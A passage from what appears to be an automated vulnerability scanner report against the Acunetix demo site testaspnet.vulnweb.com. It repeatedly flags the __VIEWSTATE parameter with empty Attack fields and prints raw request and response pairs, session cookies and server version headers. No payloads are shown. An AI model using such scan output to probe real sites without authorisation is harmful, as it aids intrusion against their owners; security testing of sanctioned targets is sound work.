are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,065 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8369&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAAAC02XS2ghkZGRUniTXuASzsrtU%2BC7gWkYo0yZkAA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLnpN2ZBwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBPgsU7sd%2FSnPcmUdg9%2FbGbEk3je6
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:53 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAAAC02XS2ghkZGRUniTXuASzsrtU+C7gWkYo0yZkAA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLnpN2ZBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBPgsU7sd/SnPcmUdg9/bGbEk3je6" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:White" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1067 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
